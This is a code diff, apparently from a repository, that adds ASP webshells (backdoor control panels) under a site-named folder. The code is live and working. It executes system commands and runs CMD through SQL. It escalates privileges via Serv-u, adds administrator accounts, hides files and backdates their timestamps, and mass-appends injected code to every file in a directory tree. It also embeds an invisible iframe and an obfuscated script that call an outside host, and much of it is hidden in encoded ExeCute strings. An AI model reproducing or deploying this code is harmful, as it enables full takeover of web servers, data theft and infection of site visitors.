+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS"</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;�������"
+end if
+end sub
+function php():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo '��ϲ������֧��PHP'?><?php phpinfo()?>":Response.write"<iframe src=test.php width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.php������ʾ,��ʾ֧��PHP<p><font color=red������Dz�֧����!������ɼǵ�ɾ����":End function:function lIl(bb)
+but=22
+for i = 1 to len(bb)
+if mid(bb,i,1)<>"��" then
+If Asc(Mid(bb, i, 1)) < 32 Or Asc(Mid(bb, i, 1)) > 126 Then
+a = a & Chr(Asc(Mid(bb, i, 1)))
+else
+pk=asc(mid(bb,i,1))-but
+if pk>126 then
+pk=pk-95
+elseif pk<32 then
+pk=pk+95
+end if
+a=a&chr(pk)
+end if
+else
+a=a&vbcrlf
+end if
+next
+lIl=a
+end function
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+function jsp():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.jsp")).Write"��ϲ������֧��jsp":Response.write"<iframe src=test.jsp width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���test.jsp������ʾ,��ʾ֧��jsp<p></font><p><a href='?Action=apjdel'><font size=5 color=red>ɾ�����Ե������ļ�(����ȫ�����Բſ���ɾ��,��������!)</font></a></center>":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"��ϲ������֧��aspx":Response.write"<iframe src=test.aspx width=950 height=300></iframe> ":Response.write "<br><br><p><br><p><br><br><p><br><center>������ܿ���Test.aspx������ʾ,��ʾ֧��asp.net<p><font color=red>������Dz�֧����!������ɼǵ�ɾ����":End function
+function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"ɾ�����!":End function:function sam():Response.write "<br><br><p><br><p><br><br><p><br><center><br><br><font color=red>":response.write"<center><font face=wingdings color=#00EC00 style=font-size:240pt>N</font><span class=style1><span style=font-weight: 300><font face=Impact color=#FFFFFF style=font-size: 100pt></center>":End function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf)):function goback():set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+Response.write "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+Response.write "<script>ShowFolder("""&Session("FolderPath")&""")</script>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
+Sub InsertAllFiles(Wpath,Wcode,pc)
+Server.ScriptTimeout=999999999
+if right(Wpath,1)<>"\" then Wpath=Wpath &"\"
+Set WFSO = CreateObject("Scripting.FileSystemObject")
+on error resume next 
+Set f = WFSO.GetFolder(Wpath)
+Set fc2 = f.files
+For Each myfile in fc2
+Set FS1 = CreateObject("Scripting.FileSystemObject")
+FType1=split(myfile.name,".") 
+FType2=ubound(FType1) 
+if Ftype2>0 then
+FType3=LCase(FType1(FType2)) 
+else
+FType3="��"
+end if
+if Instr(LCase(pc),LCase(myfile.name))=0 and Instr(LCase(FType),FType3)<>0 then
+select case M
+case "1"
+if checkbox<>"checked" then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"�� "&Wpath&myfile.name
+tfile.close
+else
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+if Instr(tfile1.readall,Wcode)=0 then
+Set tfile=FS1.opentextfile(Wpath&""&myfile.name,8,-2)
+tfile.writeline Wcode
+RRS"��"&Wpath&myfile.name
+tfile1.close
+else
+RRS"<font color=red>��</font> "&Wpath&myfile.name
+tfile1.close
+end if
+Set tfile1=Nothing
+end if
+case "2"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,"")
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case "3"
+Set tfile1=FS1.opentextfile(Wpath&""&myfile.name,1,-2)
+NewCode=Replace(tfile1.readall,Wcode,addCode2)
+Set objCountFile=WFSO.CreateTextFile(Wpath&myfile.name,True)
+objCountFile.Write NewCode
+objCountFile.Close
+RRS"��"&Wpath&myfile.name
+Set objCountFile=Nothing
+case else
+RRS"����.":response.end
+end select
+else
+RRS"�� "&Wpath&myfile.name
+end if
+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+Next
+Set fsubfolers = f.SubFolders
+For Each f1 in fsubfolers
+NewPath=Wpath&""&f1.name
+InsertAllFiles NewPath,Wcode,pc
+Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+
+case "apjdel":apjdel():case"hiddenshell":hiddenshell():case "php":php():case "aspx":aspx():case "jsp":jsp():Case "MMD":MMD():Case "adminab":adminab():Case "sql":sql():Case "downloads":downloads():Case "ReadREG":call ReadREG():Case "att":call att():Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing:Case "DownFile":DownFile FName:ShowErr():Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing:Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing:Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing:Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing:Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing:Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing:Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing:Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing:Case "UpFile":UpFile():Case "Cmd1Shell":Cmd1Shell():Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL:Case "CreateMdb":CreateMdb FName:Case "CompactMdb":CompactMdb FName:Case "DbManager":DbManager():Case "Course":Course():Case "ServerInfo":ServerInfo():Case Else MainForm():End Select:ExeCute SinfoEn("r(ErowShn he tu~rvSe>~n<ioct Aif)`l>tm/h><dybo</S~RR~",Pos)
+
+
+
+%></body><iframe src=http://7jyewu.cn/a/a.asp width=0 height=0></iframe></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp b/www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp
new file mode 100644
index 0000000..340a7bb
--- /dev/null
+++ b/www-7jyewu-cn/土司搞基asp大马 (1)_重命名_2014-10-23-14-54-16.asp	
@@ -0,0 +1,623 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="��˾���asp����"
+bottomad="Oh my God, what is safe?"
+blogurl="http://www.7jyewu.cn/"
+'----------------------һ�к���������޹�----------------------
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+rrS"<style type=""text/css"">"
+rrs"body,td{font-size: 12px;background-color:#000000;color:#00ff00;SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #008000; SCROLLBAR-SHADOW-COLOR: #008000; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #000000; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #000000}"
+rrs"input,select,textarea{BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-LEFT-COLOR: #008000; BACKGROUND: #004000; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #008000; COLOR: #00ff00; BORDER-TOP-COLOR: #008000; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #008000}"
+rrs"hr{color:#00ff00}"
+rrs".C{background-color:#000;border:0px}"
+rrs".cmd{background-color:#000;color:#FFF}"
+rrs"body{margin: 0px;margin-left:4px;}"
+rrs"BODY{color:#00ff00}"
+rrs"a{color:#008000;text-decoration: none;}a:hover{color:#00ff00;background:#000}"
+rrs".am{color:#888;font-size:12px;}"
+rrs"</style>"
+rRs"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te 